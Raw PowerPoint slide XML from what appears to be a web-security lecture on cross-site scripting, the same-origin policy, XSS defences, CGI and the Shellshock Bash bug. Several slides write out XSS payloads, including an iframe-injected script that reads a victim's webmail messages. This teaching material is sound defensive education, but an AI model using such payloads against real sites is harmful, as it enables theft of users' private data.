              <a:t>Hello, &lt;script&gt;alert(‘XSS’)&lt;/script&gt;!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267733" y="2413667"/>
            <a:ext cx="2209800" cy="983397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http://vuln.com/ says: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XSS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200" y="4942472"/>
            <a:ext cx="726756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15577" y="5181600"/>
            <a:ext cx="4982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me!!!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http://vuln.com/?user=&lt;script&gt;alert(‘XSS’)&lt;/script&gt;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2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￼￼To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compromise your browser, we need to compromise your web server </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>easy to set up new site on the Internet </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>difficult to keep new site secure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insecure infrastructure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MySql,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>web applications: phpBB2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Invision</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.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88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Review | Same-Origin Policy (SOP)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99258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9754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954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057228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3920316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31952" y="2111718"/>
            <a:ext cx="3321743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&lt;script&gt;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$.get(‘http://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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’,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    function (data) { alert(data); }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 smtClean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510214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419600"/>
            <a:ext cx="259878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173956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41986" y="5214414"/>
            <a:ext cx="3467265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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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43800" y="4355068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742840"/>
            <a:ext cx="609960" cy="60996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827110"/>
            <a:ext cx="621268" cy="62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80" y="2288247"/>
            <a:ext cx="752120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95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97180" y="2453640"/>
            <a:ext cx="260165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3942" y="2454654"/>
            <a:ext cx="2601659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C000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’, function (data)  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       { alert(data); })</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean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615" y="1959301"/>
            <a:ext cx="2875186" cy="146969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" y="1752600"/>
            <a:ext cx="430582" cy="4305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64013"/>
            <a:ext cx="484608" cy="484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 Attack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99258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8992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192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27412" y="1057228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3844116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2035518"/>
            <a:ext cx="4449295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&lt;iframe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/?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script&gt;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 $.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’, 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&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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476280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080260"/>
            <a:ext cx="4929555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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;$.get(‘ … &lt;/script&gt;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6400800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48000" y="4875074"/>
            <a:ext cx="4361251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Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;$.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’, 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function (data) { alert(data); })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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/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43800" y="4355068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742840"/>
            <a:ext cx="609960" cy="60996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80" y="2288247"/>
            <a:ext cx="752120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62128" y="5906623"/>
            <a:ext cx="419272" cy="4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98065" y="3058651"/>
            <a:ext cx="425783" cy="4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892" y="2971800"/>
            <a:ext cx="425783" cy="4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4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 animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1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Cross-Site Scripting (XSS) Attack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72" y="3536547"/>
            <a:ext cx="468227" cy="468227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52" y="1699258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00400"/>
            <a:ext cx="1636216" cy="138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245816" y="1899244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14600" y="1219200"/>
            <a:ext cx="236693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245816" y="3844116"/>
            <a:ext cx="4916984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48000" y="2035518"/>
            <a:ext cx="4449295" cy="1754326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HTTP/1.1 200 OK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…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&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“http://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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script&gt;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 $.get(‘http://gmail.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’, 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&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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27746" y="4762803"/>
            <a:ext cx="4916984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14600" y="4080260"/>
            <a:ext cx="2598788" cy="6463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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gmail.com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209800" y="5867400"/>
            <a:ext cx="4916984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48000" y="4875074"/>
            <a:ext cx="4361251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HTTP/1.1 200 OK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…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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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414" y="4776365"/>
            <a:ext cx="1066800" cy="211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543800" y="4355068"/>
            <a:ext cx="1154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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mail.com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044" y="5659204"/>
            <a:ext cx="753015" cy="753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72" y="2742840"/>
            <a:ext cx="609960" cy="60996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080" y="2288247"/>
            <a:ext cx="752120" cy="68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98065" y="3058651"/>
            <a:ext cx="425783" cy="4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09800" y="1171016"/>
            <a:ext cx="5391952" cy="279138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97180" y="2453640"/>
            <a:ext cx="260165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3942" y="2454654"/>
            <a:ext cx="2601659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$.get(‘http://gmail.com/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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msgs.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’, function (data)      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>       { alert(data); })</a:t>
            </a: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6615" y="1959301"/>
            <a:ext cx="2875186" cy="146969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" y="1752600"/>
            <a:ext cx="430582" cy="4305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64013"/>
            <a:ext cx="484608" cy="484608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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0892" y="2971800"/>
            <a:ext cx="425783" cy="41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427412" y="1057228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1" name="Rectangular Callout 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267733" y="2413667"/>
            <a:ext cx="2209800" cy="983397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http://gmail.com/ says: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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new_msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 3 }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89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XSS Defenses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Make sure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> gets shown as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>data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not executed as code!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Escape special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which ones? Depends what context your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$data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is presented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside an HTML document? &lt;div&gt;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 smtClean="0"/>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside a tag? &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“http://site.com/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 smtClean="0"/>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> x = “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 smtClean="0"/>
              <a:t>”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure to escape every last instance!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frameworks can let you declare what’s user-controlled data and automatically escape it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3858184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#3: we want data stored on a web server to be protected from unauthorized access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense: server-side security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828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Shellshock</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a.k.a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bashdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / Bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Disclosed on Sep 24, 2014)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6477000"/>
            <a:ext cx="9144000" cy="7620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2000" dirty="0" smtClean="0"/>
              <a:t>Acknowledgement: slides from Prof. Bruce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Maggs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advTm="11696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Bash Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/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Released June 7, 1989.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unix shell providing built-in commands such as cd, pwd, echo, exec, builtin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Platform for executing programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can be scripted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Environment Variables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Environment variables can be set in the Bash shell, and are passed on to programs executed from Bash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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Apple Symbols"/>
                <a:cs typeface="Apple Symbols"/>
              </a:rPr>
              <a:t>export VARNAME=“value”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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to list environment variables)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Stored Bash Shell Script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648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/>
              <a:t>An executable text file that begins with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#!program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Tells bash to pass the rest of the file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> to be executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Example: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#!/bin/bash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STR="Hello World!"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echo $STR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Hello World!  Example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Malicious Websites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Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>website automatically installs malware on visitor’s computer </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>usually via exploits in the browser or other software on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the client (without user consent) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Google’s infrastructure to analyze several billion URLs.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289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Web Content Generation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Web Server receives an HTTP request from a user.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Server runs a program to generate a response to the request.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Program output is sent to the browser.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Common Gateway Interface (CGI)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752600"/>
            <a:ext cx="8077200" cy="5262563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Helvetica" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>Oldest method of generating dynamic Web content (circa 1993, NCSA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>Operator of a Web server designates a directory to hold scripts (typically PERL) that can be run on HTTP GET, PUT, or POST requests to generate output to be sent to browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2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CGI Input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/>
              <a:t>PATH_INFO environment variable holds any path that appears in the HTTP request after the script name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QUERY_STRING holds key=value pairs that appear after ? (question mark)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Most HTTP headers passed as environment variables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In case of PUT or POST, user-submitted data provided to script via standard input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CGI Output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Anything the script writes to standard output (e.g., HTML content) is sent to the browser.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Script (Wikipedia)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7772400" cy="2514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i="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>#!/usr/bin/perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Console" pitchFamily="-111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z="2000">
              <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
            </a:endParaRP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print "Content-type: text/plain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>\r\n\r\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>";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for my $var ( sort keys %ENV ) {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 printf "%s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>\"\r\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>", $var, $ENV{$var}; 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533900"/>
            <a:ext cx="80803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Put in file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/usr/local/apache/htdocs/cgi-bin/printenv.pl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550" y="1524000"/>
            <a:ext cx="75104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Bash script that evokes PERL to print out environment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50" y="5229225"/>
            <a:ext cx="76152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Accessed via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/cgi-bin/printenv.pl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Windows Web server running cygwin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382000" cy="4419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DOCUMENT_ROOT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"C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs“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GATEWAY_INTERFACE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"CGI/1.1“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HOME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"/home/SYSTEM" HTTP_ACCEPT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"text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>html,application/xhtml+xml,application/xml;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>=0.9,*/*;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>=0.8“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HTTP_ACCEPT_CHARSET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"ISO-8859-1,utf-8;q=0.7,*;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>=0.7" HTTP_ACCEPT_ENCODING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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>, deflate“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HTTP_ACCEPT_LANGUAGE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"en-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>us,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>=0.5“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HTTP_CONNECTION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"keep-alive“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HTTP_HOST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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>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HTTP_USER_AGENT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"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0" PATH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"/home/SYSTEM/bin:/bin:/cygdrive/c/progra~2/php:/cygdrive/c/windows/system32:...“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"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PATH_INFO="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a: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/bar“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"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QUERY_STRING="var1=value1&amp;var2=with%20percent%20encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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228600" y="1535113"/>
            <a:ext cx="88312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Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>example.com/cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>printenv.pl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>/foo/bar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>var1=value1&amp;var2=with%20percent%20encoding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Shellshock Vulnerability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Function definitions are passed as environment variables that begin with ()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Error in environment variable parser: executes “garbage” after function definition.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Cygwin Bash Shell Shows Vulnerability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0"/>
            <a:ext cx="7974013" cy="439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14725" y="5938838"/>
            <a:ext cx="31242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Exact syntax matters!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Alternatively</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="153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18" b="118"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
